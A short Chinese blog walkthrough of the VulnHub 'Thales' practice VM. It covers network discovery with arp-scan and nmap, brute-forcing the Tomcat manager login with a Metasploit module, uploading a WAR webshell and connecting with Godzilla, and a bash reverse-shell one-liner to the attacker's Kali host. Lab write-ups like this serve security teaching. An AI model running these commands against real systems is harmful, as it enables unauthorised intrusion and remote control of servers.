Thales靶机在网络安全教学与实战中的应用与价值

1.下载好该靶机,将桥接模式改为NET网段并启动

https://download.vulnhub.com/thales/Thales.zip

2.借助kali来确定该靶机的IP

复制代码
arp-scan -l
nmap -O 192.168.56.101

3.访问改IP 192.168.56.101

4.点击manager app发现有个登录

使用msf爆破一下

复制代码
msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS 192.168.56.101
run

5.然后进行登录tomcat:role1,在这上传一个war包

6.然后访问这个包

7.用哥斯拉去进行连接

8.然后进行反弹shell

在kali进行监听

在终端运行

复制代码
bash -c 'bash -i>& /dev/tcp/192.168.56.102/8888 0>&1'

回到kali发现监听到

相关推荐
Hello.Reader1 小时前
Elasticsearch安全审计日志设置与最佳实践
安全·elasticsearch·jenkins
Lyndon11073 小时前
K8S 九 安全认证 TLS
安全·容器·kubernetes
hqxstudying6 小时前
Java异常处理
java·开发语言·安全·异常
终焉暴龙王14 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川16 小时前
Apache文件解析漏洞
web安全·apache
qq_430908571 天前
网络安全-机遇与挑战
安全
希望奇迹很安静1 天前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南1 天前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
安 当 加 密1 天前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车
大咖分享课2 天前
多租户系统中的安全隔离机制设计
人工智能·安全·安全隔离